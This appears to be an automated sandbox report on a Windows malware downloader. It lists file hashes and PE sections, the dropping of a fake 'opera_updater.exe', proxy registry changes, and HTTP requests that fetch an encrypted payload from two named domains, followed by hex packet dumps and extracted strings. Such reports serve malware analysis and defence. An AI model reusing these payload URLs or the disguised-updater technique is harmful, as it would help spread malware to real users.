Analysis Date2014-10-04 14:46:37
MD5f6c72138357eee87cb007530665caba3
SHA1cc896c6dfa73dab171557f5a0bd4f0f509e54234

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp2014-02-05 03:55:00
PEhash2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash7772dfa3e3a72b92db47c13e7be36e20

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbsitacademy.com
Winsock DNSwahidexpress.com

Network Details:

DNSbsitacademy.com
Type: A
107.150.48.43
DNSwahidexpress.com
Type: A
103.15.74.65
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..


Strings
l
\1.scr
C:\0ySzT4aT.exe
C:\0yXoJdS1.exe
C:\1f04c58cd64f1d992946720933171aa86f1f15c1c57d0d66f7a3dfd0d1cf617c
C:\1H6_lcAf.exe
C:\1lWYX1go.exe
C:\1x9OED5F.exe
C:\1XVNiGRb.exe
C:\2dbfd012c1b44dbc9f99256a2b84a81c857a7b9f7f28a0eec8d1c8438a2f77ed
C:\38116e45cf11c9def2c37fa30e06bc018e46cd9bf891a785b5ba6a5923323d5d
C:\3WL1_Gw5.exe
C:\487b40f83626767b4ac5984e18d98f99fb4a29a855746e349fe73a0c83ec2ca3
C:\4LBU19GE.exe
C:\4OAw6dNj.exe
C:\4vHknKs7.exe
C:\5hU_KKkp.exe
C:\7GI4gLFh.exe
C:\8iD2xfe3.exe
C:\94clNag9.exe
C:\9gcjgNaH.exe
C:\9Hvx4RXg.exe
C:\_9pyVfgZ.exe
C:\9R9GxndA.exe
C:\9Z3DNRt6.exe
C:\a34bkNIn.exe
C:\A94aUTod.exe
C:\_aAxeHJZ.exe
C:\aIUbH0QM.exe
C:\B40ygOE5.exe
C:\bKje2IhZ.exe
C:\ccKzXikR.exe
C:\CeBO5SWy.exe
C:\ChWZVCvj.exe
C:\cQdAWH3a.exe
C:\d053dbdc7fee7dfa8b7c01af8811d583b493feb3bd00dd2afa487c885907fab3
C:\d242d379e73a0b2762e096dc7771f85854a6272845ef675af6367f654920e6d1
C:\d7143680a75410278c9b95484bc00b271fcf34c23bd0de80aeec3cea7d6cedbc
C:\D7QkO4t7.exe
C:\do66h8_0.exe
C:\Documents and Settings\Administrator\
C:\dugEd0BI.exe
C:\euHCl5zZ.exe
C:\FmU16ViJ.exe
C:\GG7h0UdZ.exe
C:\H9wQLLOg.exe
C:\Hag4OLdF.exe
C:\hG3OL4IM.exe
C:\hrreFkRQ.exe
C:\hU6AF2Ic.exe
C:\_IpfgeoC.exe
C:\_Iunmiha.exe
C:\j2mY72oN.exe
C:\jESZdgrK.exe
C:\Jk2nLpP3.exe
C:\jpiHGeDv.exe
C:\jtEpPtXU.exe
C:\jUWj7TOq.exe
C:\kYD8fnKP.exe
C:\Leek6lUD.exe
C:\LiAKcAF0.exe
C:\LioP7mJk.exe
C:\LzmyGcKJ.exe
C:\M1U4wMJ9.exe
C:\mMu0FlJa.exe
C:\N6oieXD9.exe
C:\n7URlBKs.exe
C:\NLVEuUHH.exe
C:\NUcChWJX.exe
C:\nVwNaSav.exe
C:\octriONh.exe
C:\oRxOvwpF.exe
C:\oXlmXmEb.exe
C:\P1nd17rt.exe
C:\pFwvJXru.exe
C:\pjr4aBD_.exe
C:\PsX3MW6C.exe
C:\qFCCRxHi.exe
C:\qgX_3bi5.exe
C:\qYxqpebq.exe
C:\rrrNORCR.exe
C:\rzWK99mP.exe
C:\smfW_lRr.exe
C:\SqD0AIfE.exe
C:\tDiWugjj.exe
C:\_TmDm5Fe.exe
C:\TMtk4JD7.exe
C:\UowVcj_v.exe
C:\uxk8IO6h.exe
C:\v19V4M0P.exe
C:\Vh70EiAi.exe
C:\vP2nEv_R.exe
C:\w5V0zrq2.exe
C:\Wo_R3fMU.exe
C:\X4PhrCsC.exe
C:\x7OAl92o.exe
C:\X8mjs59k.exe
C:\xfqsWlNO.exe
C:\xPNihfHa.exe
C:\XPO1cNIb.exe
C:\YPkfVKVq.exe
C:\Ywr6ilYL.exe
C:\z3F0LSBP.exe
C:\zaoZlpum.exe
C:\zm1Dwebw.exe
C:\zOgUye0D.exe
C:\ztMjAXDD.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(